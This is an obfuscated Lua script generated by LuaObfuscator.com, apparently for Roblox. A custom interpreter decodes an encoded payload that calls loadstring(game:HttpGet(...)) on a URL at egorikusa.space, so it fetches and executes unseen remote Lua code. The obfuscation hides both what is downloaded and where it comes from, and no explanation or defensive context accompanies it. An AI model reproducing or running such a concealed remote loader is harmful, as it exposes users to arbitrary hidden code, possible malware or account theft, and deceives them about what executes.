--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v30,16));if v19 then local v124=0;local v125;while true do if (v124==1) then return v125;end if (v124==0) then v125=v5(v86,v19);v19=nil;v124=1;end end else return v86;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v87=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v87-(v87%(569 -(367 + 201))) ;else local v88=(929 -(214 + 179 + 534))^(v32-1) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or 0 ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (879 -(282 + 595)) );v18=v18 + (1639 -(1523 + 114)) ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 4 ;return (v40 * 16777216) + (v39 * (93426 -27890)) + (v38 * (1321 -(68 + 997))) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1;local v44=(v20(v42,(926 + 345) -(226 + 1044) ,87 -67 ) * (((1116 -(915 + 82)) -(32 + 85))^32)) + v41 ;local v45=v20(v42,21 + 0 ,7 + 24 );local v46=((v20(v42,32)==(958 -(892 + 65))) and  -(2 -1)) or 1 ;if (v45==((0 -0) -0)) then if (v44==(0 -0)) then return v46 * (350 -(87 + 263)) ;else v45=181 -(40 + 27 + 113) ;v43=(0 -0) + 0 ;end elseif (v45==(5025 -2978)) then return ((v44==(0 + 0)) and (v46 * ((3 -2)/(952 -(802 + (1337 -(1069 + 118))))))) or (v46 * NaN) ;end return v8(v46,v45-(2753 -1730) ) * (v43 + (v44/(2^(93 -41)))) ;end local function v25(v47) local v48;if  not v47 then local v89=0 -(791 -(368 + 423)) ;while true do if (v89==(0 -0)) then v47=v23();if (v47==(0 + 0)) then return "";end break;end end end v48=v3(v16,v18,(v18 + v47) -(1 -0) );v18=v18 + v47 ;local v49={};for v66=1 + 0 , #v48 do v49[v66]=v2(v1(v3(v48,v66,v66)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 0 -0 ;end)();local v91=(function() return;end)();local v93=(function() return;end)();while true do if (v90==(0 + 0)) then local v120=(function() return 0 -0 ;end)();local v121=(function() return;end)();while true do if (v120~=0) then else v121=(function() return 0;end)();while true do if ((3 -2)==v121) then v90=(function() return  #"}";end)();break;end if (v121~=0) then else v91=(function() return v92();end)();v93=(function() return nil;end)();v121=(function() return 1048 -(67 + 980) ;end)();end end break;end end end if (v90== #",") then if (v91== #"<") then v93=(function() return v92()~=(1474 -(1329 + 145)) ;end)();elseif (v91==(973 -(140 + 831))) then v93=(function() return v94();end)();elseif (v91~= #"91(") then else v93=(function() return v95();end)();end v96[v97]=(function() return v93;end)();break;end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v51=(function() return function(v98,v99,v100,v101,v102,v103,v104,v105,v106) local v107=(function() return 0;end)();local v98=(function() return;end)();local v99=(function() return;end)();while true do if (v107~=(1850 -(1409 + 441))) then else v98=(function() return 0;end)();v99=(function() return nil;end)();v107=(function() return 719 -(15 + 703) ;end)();end if (v107==(1 + 0)) then local v123=(function() return 0;end)();while true do if (v123~=0) then else while true do if (v98~=(438 -(262 + 176))) then else v99=(function() return v100();end)();if (v101(v99, #".", #"/")==(1721 -(345 + 1376))) then local v165=(function() return 688 -(198 + 490) ;end)();local v166=(function() return;end)();local v167=(function() return;end)();local v168=(function() return;end)();while true do if (v165~=2) then else if (v101(v167, #">", #"{")~= #"\\") then else v168[2]=(function() return v104[v168[8 -6 ]];end)();end if (v101(v167,4 -2 ,1208 -(696 + 510) )== #"\\") then v168[ #"gha"]=(function() return v104[v168[ #"asd"]];end)();end v165=(function() return 3;end)();end if (v165==1) then local v172=(function() return 0 -0 ;end)();local v173=(function() return;end)();while true do if (v172==(1262 -(1091 + 171))) then v173=(function() return 0 + 0 ;end)();while true do if (v173~=(3 -2)) then else v165=(function() return 2;end)();break;end if (v173~=(0 -0)) then else local v179=(function() return 0;end)();while true do if (v179~=0) then else v168=(function() return {v102(),v102(),nil,nil};end)();if (v166==(374 -(123 + 251))) then local v180=(function() return 0 -0 ;end)();while true do if (v180~=(698 -(208 + 490))) then else v168[ #"asd"]=(function() return v102();end)();v168[ #".com"]=(function() return v102();end)();break;end end elseif (v166== #"|") then v168[ #"-19"]=(function() return v103();end)();elseif (v166==2) then v168[ #"xxx"]=(function() return v103() -(2^16) ;end)();elseif (v166== #"nil") then local v185=(function() return 0;end)();local v186=(function() return;end)();while true do if ((0 + 0)==v185) then v186=(function() return 0 + 0 ;end)();while true do if (v186==0) then v168[ #"91("]=(function() return v103() -(2^16) ;end)();v168[ #"?id="]=(function() return v102();end)();break;end end break;end end end v179=(function() return 1;end)();end if ((837 -(660 + 176))~=v179) then else v173=(function() return 1 + 0 ;end)();break;end end end end break;end end end if (v165==0) then v166=(function() return v101(v99,204 -(14 + 188) , #"xxx");end)();v167=(function() return v101(v99, #"0313",681 -(534 + 141) );end)();v165=(function() return 1;end)();end if (v165==(2 + 1)) then if (v101(v167, #"gha", #"asd")== #"!") then v168[ #".com"]=(function() return v104[v168[ #"http"]];end)();end v105[v106]=(function() return v168;end)();break;end end end break;end end return v98,v99,v100,v101,v102,v103,v104,v105,v106;end end end end end;end)();local v52=(function() return function(v108,v109,v110) local v111=(function() return 0 + 0 ;end)();local v112=(function() return;end)();while true do if (v111==(0 + 0)) then v112=(function() return 0 -0 ;end)();while true do if (v112~=0) then else local v126=(function() return 0 -0 ;end)();local v127=(function() return;end)();while true do if (v126==(0 -0)) then v127=(function() return 0;end)();while true do if (v127==(0 + 0)) then local v169=(function() return 0 + 0 ;end)();while true do if (v169~=0) then else v108[v109-#"!" ]=(function() return v110();end)();return v108,v109,v110;end end end end break;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"[",v57 do FlatIdent_12703,Type,v21,Cons,v24,v25,v58,v68=(function() return v50(FlatIdent_12703,Type,v21,Cons,v24,v25,v58,v68);end)();end v56[ #"xxx"]=(function() return v21();end)();for v69= #".",v23() do FlatIdent_475BC,Descriptor,v21,v20,v22,v23,v58,v53,v69=(function() return v51(FlatIdent_475BC,Descriptor,v21,v20,v22,v23,v58,v53,v69);end)();end for v70= #"!",v23() do v54,v70,v28=(function() return v52(v54,v70,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[397 -(115 + 281) ];local v64=v60[4 -(1502 -(1408 + 92)) ];local v65=v60[3 + 0 ];return function(...) local v71=v63;local v72=v64;local v73=v65;local v74=v27;local v75=2 -1 ;local v76= -(3 -(1088 -(461 + 625)));local v77={};local v78={...};local v79=v12("#",...) -(1 -0) ;local v80={};local v81={};for v113=0,v79 do if (v113>=v73) then v77[v113-v73 ]=v78[v113 + (1 -0) ];else v81[v113]=v78[v113 + 1 ];end end local v82=(v79-v73) + ((1290 -(993 + 295)) -1) ;local v83;local v84;while true do v83=v71[v75];v84=v83[286 -(134 + 151) ];if ((v84<=(1672 -(970 + 695))) or (1136>4317)) then if (v84<=(5 -(1 + 1))) then if ((4748==4748) and (v84<=(1991 -(582 + 1408)))) then if ((3736<=4740) and (v84>(0 -0))) then do return;end else v81[v83[2 -0 ]]=v83[(1182 -(418 + 753)) -8 ];end elseif (v84==(1826 -(1195 + 629))) then v81[v83[2 -0 ]]();else local v130=v83[243 -(187 + 54) ];local v131=v81[v83[783 -(162 + 618) ]];v81[v130 + 1 ]=v131;v81[v130]=v131[v83[3 + 1 ]];end elseif (v84<=(4 + 1)) then if ((v84==(8 -4)) or (3390<=3060)) then local v135=v83[(1 + 1) -0 ];v81[v135]=v81[v135](v13(v81,v135 + 1 + 0 + 0 ,v76));else v81[v83[1638 -(1373 + 263) ]]=v62[v83[1003 -(451 + 549) ]];end elseif (v84==(2 + 4)) then v81[v83[2 -0 ]]=v83[4 -1 ]~=(1384 -(746 + 638)) ;else local v140=v83[1 + 1 ];local v141,v142=v74(v81[v140](v13(v81,v140 + (1 -0) ,v83[344 -(218 + 123) ])));v76=(v142 + v140) -((463 + 1119) -(1535 + 46)) ;local v143=0;for v160=v140,v76 do v143=v143 + 1 + 0 ;v81[v160]=v141[v143];end end elseif (v84<=11) then if (v84<=(2 + 7)) then if (v84==8) then local v144=v83[(143 + 419) -(306 + 254) ];local v145=v81[v83[(530 -(406 + 123)) + 2 ]];v81[v144 + (1 -0) ]=v145;v81[v144]=v145[v83[(3240 -(1749 + 20)) -(899 + 568) ]];else v81[v83[1 + 1 ]]=v83[2 + 1 ];end elseif ((v84>(24 -(1336 -(1249 + 73)))) or (999>2693)) then local v151=v83[605 -(268 + 335) ];local v152,v153=v74(v81[v151](v13(v81,v151 + 1 ,v83[293 -(60 + 230) ])));v76=(v153 + v151) -(573 -(426 + 146)) ;local v154=0 + 0 ;for v163=v151,v76 do local v164=1456 -(282 + 1174) ;while true do if (v164==(811 -(569 + 242))) then v154=v154 + ((1 + 1) -1) ;v81[v163]=v152[v154];break;end end end else local v155=v83[2];v81[v155]=v81[v155](v13(v81,v155 + 1 + 0 ,v76));end elseif (v84<=(1037 -(706 + 318))) then if (v84==12) then v81[v83[1253 -(721 + 530) ]]=v83[1274 -(945 + 326) ]~=0 ;else v81[v83[(1149 -(466 + 679)) -2 ]]();end elseif (v84==(13 + 1)) then v81[v83[702 -(271 + 429) ]]=v62[v83[3]];else do return;end end v75=v75 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403343Q00682Q7470733A2Q2F65676F72696B7573612E73706163652F3465343665612Q36613064663039352Q33373835323866652E6C756100093Q0012053Q00013Q001205000100023Q00200800010001000300122Q000300044Q000C000400014Q0007000100044Q00045Q00022Q00023Q000100012Q00013Q00017Q00",v9(),...);